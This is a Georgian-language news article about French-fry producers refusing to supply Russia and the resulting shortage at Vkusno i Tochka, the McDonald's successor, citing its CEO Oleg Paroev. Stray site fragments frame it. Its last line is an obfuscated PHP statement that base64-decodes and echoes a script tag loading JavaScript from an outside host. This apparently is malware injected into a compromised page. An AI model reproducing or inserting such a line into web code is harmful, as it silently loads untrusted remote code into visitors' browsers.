celsiusi
ავერსი საქკაბელი
კარტოფილი „ფრის“ მწარმოებლები რუსეთში პროდუქციის მიწოდებაზე უარს აცხადებენ. ამის შესახებ ინფორმაციას სააგენტო „როიტერი“ რუსულ მედიაზე დაყრდნობით ავრცელებს. მედიასთან საუბარში რუსეთში რესტორნების ქსელის, „მაკდონალდსის“ ჩამნაცვლებელი კომპანიის გენერალურმა დირექტორმა ოლეგ პაროევმა აღიარა, რომ კომპანია შემოდგომამდე კარტოფილი „ფრის“ დეფიციტს განიცდის.
 
როგორც ცნობილია,„მაკდონალდსმა“ რუსეთი უკრაინაში ომის დაწყების შემდეგ დაწესებული სანქციების ფონზე დატოვა. კომპანიამ მაისში ქვეყანაში არსებული ყველა რესტორანი ადგილობრივ მფლობელზე გაყიდა. 12 ივნისს რესტორნებმა მუშაობა განაახლეს ახალი სახელწოდებით „ვკუსნო ი ტოჩკა“. როგორც მედია წერს, რესტორნების მფლობელი აღიარებს, რომ შემოდგომამდე კარტოფილი „ფრის“ დეფიციტს განიცდის. აღნიშნულის მიზეზად კომპანიის მფლობელი რუსეთში ცუდ მოსავალს და მიწოდების პრობლემებს ასახელებს.
 
„რაც ახლა მოხდა, არის ის, რომ ცნობილი მოვლენების გამო მრავალმა უცხოურმა კომპანიამ, მე ვიტყოდი, რომ კარტოფილი „ფრის“ ყველა უმსხვილესმა მწარმოებელმა უარი თქვა ამ პროდუქციის რუსეთში მიწოდებაზე“, – განაცხადა პაროევმა RBC TV-სთან ინტერვიუში.
 
მისი თქმით, კარტოფილი „ფრის“ მწარმოებელი ქარხნები როგორც რუსეთისადმი მეგობრულ, ისე არამეგობრულ ქვეყნებში ეკუთვნის 5-6 მსხვილ კომპანიას, რომელთა სათაო ოფისები რუსეთისადმი არამეგობრულ ქვეყნებშია განთავსებული. შესაბამისად, მათ უარი თქვეს რუსეთში პროდუქციის მიწოდებაზე.
 
პაროევის თქმით, რუსულ კარტოფილთან დაკავშირებული პრობლემები უკავშირდება იმ კონკრეტული სახეობის დეფიციტს, რომელიც გამოიყენება რესტორნების ქსელის მიერ კარტოფილი „ფრისთვის“. ამასთან, მან არ გამორიცხა, რომ მომავალ წელს შესაძლოა, რუსეთში კარტოფილი „ფრის“ წარმოებასთან დაკავშირებით სირთულეები გაჩნდეს, რადგან ქვეყანაში მხოლოდ რამდენიმე საწარმო არსებობს, რომელსაც კარტოფილის შესაბამისად გადამუშავება შეუძლია.
639
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");